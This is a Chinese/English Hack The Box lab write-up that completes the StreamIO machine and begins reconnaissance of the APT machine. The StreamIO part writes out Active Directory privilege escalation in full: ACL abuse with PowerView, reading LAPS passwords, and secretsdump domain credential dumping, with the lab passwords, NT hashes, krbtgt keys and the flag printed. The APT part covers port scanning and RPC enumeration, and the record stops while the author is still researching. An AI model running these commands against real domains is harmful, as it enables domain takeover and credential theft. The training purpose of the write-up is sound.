The command completed successfully.
*Evil-WinRM* PS C:\Users\nikk37\Documents> dsget user "CN=jdgodd,CN=users,DC=streamio,DC=htb" -memberof -expand
"CN=Domain Users,CN=Users,DC=streamIO,DC=htb"
"CN=Users,CN=Builtin,DC=streamIO,DC=htb"
*Evil-WinRM* PS C:\Users\nikk37\Documents> net groups
Group Accounts for \\
-------------------------------------------------------------------------------
*Cloneable Domain Controllers
*CORE STAFF
*DnsUpdateProxy
*Domain Admins
*Domain Computers
*Domain Controllers
*Domain Guests
*Domain Users
*Enterprise Admins
*Enterprise Key Admins
*Enterprise Read-only Domain Controllers
*Group Policy Creator Owners
*Key Admins
*Protected Users
*Read-only Domain Controllers
*Schema Admins
The command completed with one or more errors.
# For example,we are interested in group'CORE STAFF',we want to know more details of it,so:
*Evil-WinRM* PS C:\Users\nikk37\Documents> get-adgroup "core staff"
DistinguishedName : CN=CORE STAFF,CN=Users,DC=streamIO,DC=htb
GroupCategory : Security
GroupScope : Global
Name : CORE STAFF
ObjectClass : group
ObjectGUID : 113400d4-c787-4e58-91ad-92779b38ecc5
SamAccountName : CORE STAFF
SID : S-1-5-21-1470860369-1569627196-4264678630-1108
# if we want to know its acl:
*Evil-WinRM* PS C:\Users\nikk37\Documents> (get-acl "AD:CN=CORE STAFF,CN=Users,DC=streamio,DC=htb").access
。。。
ActiveDirectoryRights : WriteOwner
InheritanceType : None
ObjectType : 00000000-0000-0000-0000-000000000000
InheritedObjectType : 00000000-0000-0000-0000-000000000000
ObjectFlags : None
AccessControlType : Allow
IdentityReference : streamIO\JDgodd
IsInherited : False
InheritanceFlags : None
PropagationFlags : None
。。。
# We notice this permission that interests us, and it is related to JDgodd, which is the path that bloodhound shows us.
# However, the list of results is very long, and sometimes it is not easy to locate the key information. We can filter according to the users we have obtained to see what permissions the user has in the acl of this group,so:
*Evil-WinRM* PS C:\Users\nikk37\Documents> (get-acl "AD:CN=CORE STAFF,CN=Users,DC=streamio,DC=htb").access | where-object { $_.IdentityReference -like "*jdgodd*"}
ActiveDirectoryRights : WriteOwner
InheritanceType : None
ObjectType : 00000000-0000-0000-0000-000000000000
InheritedObjectType : 00000000-0000-0000-0000-000000000000
ObjectFlags : None
AccessControlType : Allow
IdentityReference : streamIO\JDgodd
IsInherited : False
InheritanceFlags : None
PropagationFlags : None
# In addition to acl, we also need to know what permissions a group has on computers in the domain, but before we do that, we need to know how many computers are active in the domain,so:
*Evil-WinRM* PS C:\Users\nikk37\Documents> get-adcomputer -filter *
DistinguishedName : CN=DC,OU=Domain Controllers,DC=streamIO,DC=htb
DNSHostName : DC.streamIO.htb
Enabled : True
Name : DC
ObjectClass : computer
ObjectGUID : 8c0f9a80-aaab-4a78-9e0d-7a4158d8b9ee
SamAccountName : DC$
SID : S-1-5-21-1470860369-1569627196-4264678630-1000
UserPrincipalName :
# Then we need to traverse all the OU of the DC and visit its acl one by one and associate with the core staff group,so:
*Evil-WinRM* PS C:\Users\nikk37\Documents> get-adorganizationalunit -filter * | %{ (get-acl "Ad:$($_.distinguishedname)").access } | where-object { $_.identityreference -like "*core*"}
ActiveDirectoryRights : ReadProperty, ExtendedRight
InheritanceType : Descendents
ObjectType : a156e052-fb12-45bc-9a00-056271040d9f
InheritedObjectType : bf967a86-0de6-11d0-a285-00aa003049e2
ObjectFlags : ObjectAceTypePresent, InheritedObjectAceTypePresent
AccessControlType : Allow
IdentityReference : streamIO\CORE STAFF
IsInherited : False
InheritanceFlags : ContainerInherit
PropagationFlags : InheritOnly
ActiveDirectoryRights : ReadProperty
InheritanceType : Descendents
ObjectType : a0ffa854-9b42-45fa-bd07-4e1a651f2610
InheritedObjectType : bf967a86-0de6-11d0-a285-00aa003049e2
ObjectFlags : ObjectAceTypePresent, InheritedObjectAceTypePresent
AccessControlType : Allow
IdentityReference : streamIO\CORE STAFF
IsInherited : False
InheritanceFlags : ContainerInherit
PropagationFlags : InheritOnly
# The above shows that the core staff group can read some properties of the target dc, and we certainly hope that it can read the administrator password.Looking back,
# we found laps when we looked at the target software, so if we can read laps, this constitutes a perfect escalation attack path, which is exactly what is shown in the bloodhound analysis chart.
所以,总结一下这条提权攻击路径,可以将用户JDgodd
加入core staff
组,以该组的身份读取laps
权限提升
powerview工具将用户添加到组
将用户加入到某个组中,是需要用到第三方的工具来实现的,比如powerview
地址:
https://github.com/cvestone/PowerSploit/blob/master/Recon/PowerView.ps1
将脚本下载或复制到本地,然后再通过evil-winrm
上传到目标机器:
*Evil-WinRM* PS C:\programdata> upload /home/cvestone/Desktop/htb/StreamIO/PowerView.ps1
Info: Uploading /home/cvestone/Desktop/htb/StreamIO/PowerView.ps1 to C:\programdata\PowerView.ps1
Progress: 55% : |▓▓▓▓▒░░░░░|
Data: 4190544 bytes of 4190544 bytes copied
Info: Upload successful!
# Then introduce the script into memory
*Evil-WinRM* PS C:\Users\nikk37\Documents> . .\powerview.ps1
# Then start to add user to group
*Evil-WinRM* PS C:\Users\nikk37\Documents> $pass =convertto-securestring 'JDg0dd1s@d0p3cr3@t0r' -AsplainText -force
*Evil-WinRM* PS C:\programdata> $cred =new-object system.management.automation.pscredential('streamio.htb\jdgodd',$pass)
*Evil-WinRM* PS C:\programdata> add-domainobjectacl -Credential $cred -Targetidentity "Core Staff" -principalIdentity "streamio\jdgodd"
*Evil-WinRM* PS C:\programdata> add-domaingroupmember -credential $cred -identity "Core Staff" -members "streamio\jdgodd"
*Evil-WinRM* PS C:\programdata> net user jdgodd
User name JDgodd
Full Name
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 2/22/2022 1:56:42 AM
Password expires Never
Password changeable 2/23/2022 1:56:42 AM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 2/29/2024 3:13:43 AM
Logon hours allowed All
Local Group Memberships
Global Group memberships *Domain Users *CORE STAFF
The command completed successfully.
# We make it! Now jdgodd is in the "CORE STAFF" group.
读取laps获取域管理员凭据
然后我们就可以尝试读取laps:
*Evil-WinRM* PS C:\programdata> get-adcomputer dc -properties * -credential $cred
。。。
*Evil-WinRM* PS C:\programdata> get-adcomputer -filter * -properties ms-Mcs-AdmPwd -credential $cred
。。。
如果这种方式读取不到,还有其他方式:
# First way:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# ldapsearch -H ldap://10.129.170.48 -b "dc=streamio,dc=htb" -x -D jdgodd@streamio.htb -w 'JDg0dd1s@d0p3cr3@t0r' "(ms-MCs-admpwd=*)" ms-mcs-admpwd
# extended LDIF
#
# LDAPv3
# base <dc=streamio,dc=htb> with scope subtree
# filter: (ms-MCs-admpwd=*)
# requesting: ms-mcs-admpwd
#
# DC, Domain Controllers, streamIO.htb
dn: CN=DC,OU=Domain Controllers,DC=streamIO,DC=htb
ms-Mcs-AdmPwd: 7hcr@&{jI91l7M
# search reference
ref: ldap://ForestDnsZones.streamIO.htb/DC=ForestDnsZones,DC=streamIO,DC=htb
# search reference
ref: ldap://DomainDnsZones.streamIO.htb/DC=DomainDnsZones,DC=streamIO,DC=htb
# search reference
ref: ldap://streamIO.htb/CN=Configuration,DC=streamIO,DC=htb
# search result
search: 2
result: 0 Success
# numResponses: 5
# numEntries: 1
# numReferences: 3
# Second way:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# crackmapexec smb streamio.htb -u jdgodd -p 'JDg0dd1s@d0p3cr3@t0r' --laps --ntds
SMB streamio.htb 445 DC [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:streamIO.htb) (signing:True) (SMBv1:False)
SMB streamio.htb 445 DC [-] DC\administrator:7hcr@&{jI91l7M STATUS_LOGON_FAILURE
我们拿到了域管理员的凭据
尝试连接:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# evil-winrm -u administrator -p '7hcr@&{jI91l7M' -i streamio.htb
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
streamio\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../
*Evil-WinRM* PS C:\Users\Administrator> ls
Directory: C:\Users\Administrator
Mode LastWriteTime Length Name
---- ------------- ------ ----
d-r--- 2/22/2022 1:33 AM 3D Objects
d-r--- 2/22/2022 1:33 AM Contacts
d-r--- 5/30/2022 4:53 PM Desktop
d-r--- 2/26/2022 12:41 PM Documents
d-r--- 2/22/2022 1:33 AM Downloads
d-r--- 2/22/2022 1:33 AM Favorites
d-r--- 2/22/2022 1:33 AM Links
d-r--- 2/22/2022 1:33 AM Music
d-r--- 2/22/2022 1:33 AM Pictures
d-r--- 2/22/2022 1:33 AM Saved Games
d-r--- 2/22/2022 1:33 AM Searches
d-r--- 2/22/2022 1:33 AM Videos
*Evil-WinRM* PS C:\Users\Administrator> cd Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ls
*Evil-WinRM* PS C:\Users\Administrator\Desktop> cd ../../
*Evil-WinRM* PS C:\Users> ls
Directory: C:\Users
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 2/22/2022 2:48 AM .NET v4.5
d----- 2/22/2022 2:48 AM .NET v4.5 Classic
d----- 2/26/2022 10:20 AM Administrator
d----- 5/9/2022 5:38 PM Martin
d----- 2/26/2022 9:48 AM nikk37
d-r--- 2/22/2022 1:33 AM Public
*Evil-WinRM* PS C:\Users> cd martin
*Evil-WinRM* PS C:\Users\martin> cd desktop
*Evil-WinRM* PS C:\Users\martin\desktop> ls
Directory: C:\Users\martin\desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 2/29/2024 2:54 AM 34 root.txt
*Evil-WinRM* PS C:\Users\martin\desktop> type root.txt
b97157078aa375824e9cf9d9ac12c8eb
至此,我们最终拿到了管理员的flag
额外的小验证
那么,如何进一步验证我们拿下的就是一台域控制器呢?我们知道,如果拿下一台域控,可以做hash传递,也就是可以转储出域内的所有hash:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# /usr/share/doc/python3-impacket/examples/secretsdump.py 'streamio.htb/administrator:7hcr@&{jI91l7M'@streamio.htb
Impacket v0.12.0.dev1+20231114.165227.4b56c18 - Copyright 2023 Fortra
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x4dbf07084a530cfa7ab417236bd4a647
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:6a559f691b75bff16a07ecbd12e3bdfb:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
streamIO\DC$:aes256-cts-hmac-sha1-96:eb69ddfa9a4b725ebff4522fff46da774d2029fc19f79a6252b7fc6d07485def
streamIO\DC$:aes128-cts-hmac-sha1-96:27748f416a29158e00e4d40a4d182d33
streamIO\DC$:des-cbc-md5:380bb370c7236ec8
streamIO\DC$:plain_password_hex:810cfa628253e7db1ad4d299b8d385a042451764d8b8512c58d603dab8fb6255ffea028f0a02a823116d8b2c7eefff60499c6498e95827077bc5495b4dbbd8fb5fe3095afca5
5f051384ece642645a2aa18233b4d60a11a4d3ea7b29de594a8213ff23043789a3e64054bbf6cef97778d95c346e36b03b41cb32ca80bb6110bbb13d03174c8522e44b0e5da9899c0cb4a30a382990ba49fb68aecad7
83e3d56906d50b827c13a0b25701da705684f2cdc9e553b69ebe81f5012e2c221594e10df542b544d2fa9550f3941db439dba1a786fd2beb1df27376fbbeded088bb8a86830876d86b5eb155a4dfa3f2181e8e35
streamIO\DC$:aad3b435b51404eeaad3b435b51404ee:f9b55c504da537ad590220bd0d28774f:::
[*] DPAPI_SYSTEM
dpapi_machinekey:0xd8b78bca07d4bce21bce1ae04bf231978c84407f
dpapi_userkey:0x9b682d0f5f9b63c03827113581bc2dc4f993e3ee
[*] NL$KM
0000 A5 68 6C 6F 0F D6 72 8F 9E DE A2 27 47 D1 73 3A .hlo..r....'G.s:
0010 EA FB 23 4A 58 C9 04 91 95 A2 E7 3C 63 1A E8 B1 ..#JX......<c...
0020 DA D8 C8 95 DD 09 23 97 A5 5A 21 74 17 17 CC C6 ......#..Z!t....
0030 5E 1B F7 BE 34 99 DC 39 D1 72 7B 3E 19 B6 B2 3C ^...4..9.r{>...<
NL$KM:a5686c6f0fd6728f9edea22747d1733aeafb234a58c9049195a2e73c631ae8b1dad8c895dd092397a55a21741717ccc65e1bf7be3499dc39d1727b3e19b6b23c
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:e8888d458703384be8f16508b9f9cc84:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:5f5142aae3cce656285ce4504605dec1:::
JDgodd:1104:aad3b435b51404eeaad3b435b51404ee:8846130392c4169cb552fe5b73b046af:::
Martin:1105:aad3b435b51404eeaad3b435b51404ee:a9347432fb0034dd1814ca794793d377:::
nikk37:1106:aad3b435b51404eeaad3b435b51404ee:17a54d09dd09920420a6cb9b78534764:::
yoshihide:1107:aad3b435b51404eeaad3b435b51404ee:6d21f46be3697ba16b6edef7b3399bf4:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:f9b55c504da537ad590220bd0d28774f:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:c71b0faaa98af8d80722331c61e9f727c6f9fc246f0e9acce83ed37ce5285147
Administrator:aes128-cts-hmac-sha1-96:a14783c47207809883c1b3b003dfb553
Administrator:des-cbc-md5:49b5fb4c64755829
krbtgt:aes256-cts-hmac-sha1-96:668ee76d84bf5ea1e845933ace27ecde98b736f218c0830cbe71e18812166cda
krbtgt:aes128-cts-hmac-sha1-96:f91f8540a9aca4af627959d1cb888f13
krbtgt:des-cbc-md5:d032029279fbc4fd
JDgodd:aes256-cts-hmac-sha1-96:53fcc54b04d560253b0fdb259b9de0da8c5c65916d12b5e4b5dd4723d9003443
JDgodd:aes128-cts-hmac-sha1-96:22e9e5268e40d1fc8198415fdd6c64bd
JDgodd:des-cbc-md5:76d0fe1a231934e5
Martin:aes256-cts-hmac-sha1-96:d5eed6cafcabd393a2101f4fadc143344c48ebaacb065490510ef608424065f0
Martin:aes128-cts-hmac-sha1-96:0a0cff37d02d1299a24fe58debb20392
Martin:des-cbc-md5:570bfd51e9f7e3bf
nikk37:aes256-cts-hmac-sha1-96:d4a44efe5740231cad3da85c294b01678840ac7a5b6207f366c36fc3c5b59347
nikk37:aes128-cts-hmac-sha1-96:eaff7bb14b5c41f80e5216cb09e16435
nikk37:des-cbc-md5:ae5ddf8fc2853e67
yoshihide:aes256-cts-hmac-sha1-96:0849b8c4eaee4edeaed2972752529251bbb616e9f24e08992923b4f18e9d73b0
yoshihide:aes128-cts-hmac-sha1-96:d668308ea96ebda1d31e3bb77b8e6768
yoshihide:des-cbc-md5:3bae5257ea029d61
DC$:aes256-cts-hmac-sha1-96:eb69ddfa9a4b725ebff4522fff46da774d2029fc19f79a6252b7fc6d07485def
DC$:aes128-cts-hmac-sha1-96:27748f416a29158e00e4d40a4d182d33
DC$:des-cbc-md5:89d95129f7c13119
[*] Cleaning up...
[*] Stopping service RemoteRegistry
[-] SCMR SessionError: code: 0x41b - ERROR_DEPENDENT_SERVICES_RUNNING - A stop control has been sent to a service that other running services are dependent on.
[*] Cleaning up...
[*] Stopping service RemoteRegistry
。。。
总结
(待复盘时总结)
APT
“红队笔记”学习记录
机器介绍
APT is an insane difficulty Windows machine where RPC and HTTP services are only exposed. Enumeration of existing RPC interfaces provides an interesting object that can be used to disclose the IPv6 address. The box is found to be protected by a firewall exemption that over IPv6 can give access to a backup share. User enumeration and bruteforce attacks can give us access to the registry which contains login credentials. The machine is configured to allow authentication via the NTLMv1 protocol, which can be leveraged to gain system access.
APT 是一个极其困难的 Windows 机器,其中仅公开 RPC 和 HTTP 服务。现有 RPC 接口的枚举提供了一个有趣的对象,可用于公开 IPv6 地址。该盒子受到防火墙豁免的保护,可以通过 IPv6 访问备份共享。用户枚举和暴力攻击可以让我们访问包含登录凭据的注册表。该计算机配置为允许通过 NTLMv1 协议进行身份验证,可利用该协议来获取系统访问权限。
难度
Insane
信息搜集
tcp全端口扫描
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# nmap -sT --min-rate 10000 -p- $ip1 -oA nmapscan/tcports
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-02 14:59 CST
Nmap scan report for 10.129.96.60
Host is up (0.23s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
Nmap done: 1 IP address (1 host up) scanned in 46.32 seconds
处理信息:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# tcports=$(grep open nmapscan/tcports.nmap | awk -F'/' '{print $1}' | paste -sd ',')
echo $tcports
80,135
tcp详细扫描
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# nmap -sT -sC -sV -O -p80,135 $ip1 -oA nmapscan/tcpdetails
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-02 15:05 CST
Nmap scan report for 10.129.96.60
Host is up (0.21s latency).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Gigantic Hosting | Home
135/tcp open msrpc Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2016 (88%)
OS CPE: cpe:/o:microsoft:windows_server_2016
Aggressive OS guesses: Microsoft Windows Server 2016 (88%)
No exact OS matches for host (test conditions non-ideal).
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.68 seconds
udp扫描
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# nmap -sU -p- --min-rate 10000 10.129.96.60 -oA nmapscan/udports
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-02 15:10 CST
Nmap scan report for 10.129.96.60
Host is up (0.14s latency).
All 65535 scanned ports on 10.129.96.60 are in ignored states.
Not shown: 65535 open|filtered udp ports (no-response)
Nmap done: 1 IP address (1 host up) scanned in 14.26 seconds
没有扫描出任何结果
脚本漏扫
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# nmap --script=vuln -p80,135 10.129.96.60 -oA nmapscan/vuln
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-02 15:08 CST
Stats: 0:02:08 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 98.03% done; ETC: 15:10 (0:00:02 remaining)
Stats: 0:04:11 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.51% done; ETC: 15:12 (0:00:01 remaining)
Stats: 0:06:20 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.51% done; ETC: 15:14 (0:00:02 remaining)
Nmap scan report for 10.129.96.60
Host is up (0.23s latency).
PORT STATE SERVICE
80/tcp open http
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=10.129.96.60
| Found the following possible CSRF vulnerabilities:
|
| Path: http://10.129.96.60:80/support.html
| Form id:
|_ Form action: https://10.13.38.16/contact-post.html
|_http-dombased-xss: Couldn't find any DOM based XSS.
135/tcp open msrpc
Nmap done: 1 IP address (1 host up) scanned in 741.60 seconds
扫描结果分析
我们扫描出的结果很有限,显然优先访问80端口的web服务寻找潜在的漏洞,最后才是考虑msrpc
利用
尝试访问web服务
点击网站的很多功能点后,发现都是重定向到首页,说明该网站还只是处于战略部署阶段,并不完善,只是一个demo,而且看起来像是用某种cms框架搭建的,并且大部分是纯静态的,没有什么可利用的地方,除了SUPPORT
:
发现该表单数据被提交到一个新的ip地址,说明内网中可能不仅仅存在一台设备:
因此这种情况下再尝试sql注入、xss等的必要性并不大,暂时先放弃
目录爆破
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# gobuster dir -u http://10.129.96.60 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# gobuster dir -u http://10.129.96.60 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.129.96.60
[+] Method: GET
[+] Threads: 50
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/images (Status: 301) [Size: 150] [--> http://10.129.96.60/images/]
/Images (Status: 301) [Size: 150] [--> http://10.129.96.60/Images/]
/css (Status: 301) [Size: 147] [--> http://10.129.96.60/css/]
/js (Status: 301) [Size: 146] [--> http://10.129.96.60/js/]
/fonts (Status: 301) [Size: 149] [--> http://10.129.96.60/fonts/]
/IMAGES (Status: 301) [Size: 150] [--> http://10.129.96.60/IMAGES/]
/Fonts (Status: 301) [Size: 149] [--> http://10.129.96.60/Fonts/]
/CSS (Status: 301) [Size: 147] [--> http://10.129.96.60/CSS/]
/JS (Status: 301) [Size: 146] [--> http://10.129.96.60/JS/]
===============================================================
Finished
===============================================================
并没有扫描到什么特别的,尝试访问这些目录也没有权限
查看源码
既然猜测可能是某个cms搭建的,源码中可能会暴露出信息,特别是注释,但是从结果来看,这并不是cms,而是从刚才的另一个ip中镜像而来的网站,并且暴露了对应的工具,显然接下来可以看看该工具是否有存在什么公开漏洞
寻找公开漏洞
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# searchsploit HTTrack Website Copier
Exploits: No Results
Shellcodes: No Results
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# searchsploit HTTrack Website
Exploits: No Results
Shellcodes: No Results
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# searchsploit HTTrack
Exploits: No Results
Shellcodes: No Results
搜索:
显然该镜像工具有存在过漏洞,看看漏洞细节
但是我们了解到该工具是个二进制程序,而不是暴露在web中的程序,并且该二进制程序并没有暴露出可以让我们交互的端口,因此公开漏洞中的缓冲区溢出漏洞、dll劫持等暂时是无法利用的,因此这个攻击路径行不通,没有必要浪费时间复现
尝试查看图像是否存在隐写信息
由于常规的思路我们都尝试过,没有找到什么可利用的信息,这时可以尝试下载网站的图像,看看是否存在隐写信息
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# wget http://10.129.96.60/images/p2.jpg
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# exiftool p2.jpg
ExifTool Version Number : 12.76
File Name : p2.jpg
Directory : .
File Size : 28 kB
File Modification Date/Time : 2019:09:06 01:58:48+08:00
File Access Date/Time : 2024:03:02 16:31:45+08:00
File Inode Change Date/Time : 2024:03:02 16:31:45+08:00
File Permissions : -rw-r--r--
File Type : JPEG
File Type Extension : jpg
MIME Type : image/jpeg
JFIF Version : 1.02
Resolution Unit : None
X Resolution : 100
Y Resolution : 100
Quality : 60%
DCT Encode Version : 100
APP14 Flags 0 : [14], Encoded with Blend=1 downsampling
APP14 Flags 1 : (none)
Color Transform : YCbCr
Image Width : 370
Image Height : 247
Encoding Process : Progressive DCT, Huffman coding
Bits Per Sample : 8
Color Components : 3
Y Cb Cr Sub Sampling : YCbCr4:4:4 (1 1)
Image Size : 370x247
Megapixels : 0.091
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# strings p2.jpg
。。。
依然没有找到有价值信息,寻找过程中发现有一张图片有点可疑:
因为这里的文字出现在这里看着奇怪,像是某种提示,并且文件名也像是有某种特别的含义
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# wget http://10.129.96.60/images/outsource.jpg
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# exiftool outsource.jpg
ExifTool Version Number : 12.76
File Name : outsource.jpg
Directory : .
File Size : 1779 kB
File Modification Date/Time : 2019:12:23 19:36:32+08:00
File Access Date/Time : 2024:03:02 16:35:26+08:00
File Inode Change Date/Time : 2024:03:02 16:35:26+08:00
File Permissions : -rw-r--r--
File Type : JPEG
File Type Extension : jpg
MIME Type : image/jpeg
JFIF Version : 1.01
Resolution Unit : inches
X Resolution : 300
Y Resolution : 300
Image Width : 1920
Image Height : 1152
Encoding Process : Baseline DCT, Huffman coding
Bits Per Sample : 8
Color Components : 3
Y Cb Cr Sub Sampling : YCbCr4:4:4 (1 1)
Image Size : 1920x1152
Megapixels : 2.2
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# strings outsource.jpg
。。。
然而还是没有什么特别的,到这里暂时没有什么收获,该端口的利用暂时放弃,但是不排除后面获取更多信息后可能还需要返回到这里尝试利用
尝试连接msrpc
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# rpcclient -U '' -N 10.129.96.60
Cannot connect to server. Error was NT_STATUS_IO_TIMEOUT
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# rpcclient -U '' -N -p 135 10.129.96.60
Cannot connect to server. Error was NT_STATUS_IO_TIMEOUT
由于该工具默认是连接139
,我们把两种都尝试了,都连接不了
尝试利用msrpc
对于该服务的利用,可以尝试来自于python3的impacket
库的重要工具
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# export PATH=/usr/share/doc/python3-impacket/examples:$PATH
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# echo $PATH
/usr/share/doc/python3-impacket/examples:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin:/root/.local/bin:/root/.local/bin
这个类库在渗透过程中对基本协议的深度扫描和利用非常重要,其中的很多工具在渗透利用中都经常出现,以下是官方对它的介绍:
还有:https://www.coresecurity.com/core-labs/open-source-tools/impacket
注意这里的low-level
的理解是指代底层级别的,它非常重要而不是水平很低,从底层级别对这些协议的数据包进行访问,开始利用:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# rpcdump.py 10.129.96.60
。。。
rpcdump.py: This script will dump the list of RPC endpoints and string bindings registered at the target. It will also try to match them with a list of well known endpoints.
rpcdump.py:此脚本将转储在目标上注册的 RPC 端点和字符串绑定的列表。它还会尝试将它们与众所周知的端点列表进行匹配。
这个工具仅仅是把rpc
协议下在135
端口下跑的DCOM
组件和方法等列出来,但是我们并不知道它们具体都是做什么的,这时候需要用到rpcmap
,这个工具相比于rpcdump
更精细,它会映射出DCOM
的具体内容并对它进行深度的枚举
rpcmap.py: Scan for listening DCE/RPC interfaces. This binds to the MGMT interface and gets a list of interface UUIDs. If the MGMT interface is not available, it takes a list of interface UUIDs seen in the wild and tries to bind to each interface.
rpcmap.py:扫描侦听 DCE/RPC 接口。这会绑定到 MGMT 接口并获取接口 UUID 列表。如果 MGMT 接口不可用,它将获取在野外看到的接口 UUID 列表,并尝试绑定到每个接口。
DCOM(分布式组件对象模型)是一组 Microsoft 概念和程序接口,其中客户端程序对象可以向网络中其他计算机上的服务器程序对象请求服务。
爆破接口uuid和操作数
这对于我们来说很陌生,但这很正常,渗透过程中经常会遇到陌生的技术,我们现在只想知道这里结果中的uuid
是什么,背后是对应在运行着什么服务/接口,这里可以通过rpcmap
尝试爆破:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# rpcmap.py ncacn_ip_tcp:10.129.96.60[135] -brute-uuids -brute-opnums
。。。
Protocol: [MS-DCOM]: Distributed Component Object Model (DCOM) Remote
Provider: rpcss.dll
UUID: 99FCFEC4-5260-101B-BBCB-00AA0021347A v0.0
Opnum 0: rpc_x_bad_stub_data
Opnum 1: rpc_x_bad_stub_data
Opnum 2: rpc_x_bad_stub_data
Opnum 3: success
Opnum 4: rpc_x_bad_stub_data
Opnum 5: success
Opnums 6-64: nca_s_op_rng_error (opnum not found)
Protocol: [MS-RPCE]: Remote Management Interface
Provider: rpcrt4.dll
UUID: AFA8BD80-7D8A-11C9-BEF4-08002B102989 v1.0
Opnum 0: success
Opnum 1: rpc_x_bad_stub_data
Opnum 2: success
Opnum 3: success
Opnum 4: rpc_x_bad_stub_data
Opnums 5-64: nca_s_op_rng_error (opnum not found)
。。。
除了上述列出的,其他都是rpc_s_access_denied
或者爆破不成功,没意义
尝试搜索这两个uuid:
这已经显示了对应的接口名,看看该接口的细节,这里还给了对应的调用方法:
寻找利用途径
仔细观察这些方法有自己的操作数,这正好对应我们上面爆破的结果,因此我们应该重点关注第三和第五个方法的利用,其中第五个是另一个的扩展。但这些信息是来自于微软官方文档,不可能提供利用信息,我们应该进一步搜索:
确实有人和我们一样想尝试调用这个方法,并且给出了解决工具:
再进一步搜索:
其中我们在下面的文章中发现利用该解析器的细节:
The OXID Resolver [Part 1] – Remote enumeration of network interfaces without any authentication
https://www.cyber.airbus.com/the-oxid-resolver-part-2-accessing-a-remote-object-inside-dcom/
This article series will be composed of two parts:
本系列文章将由两部分组成:
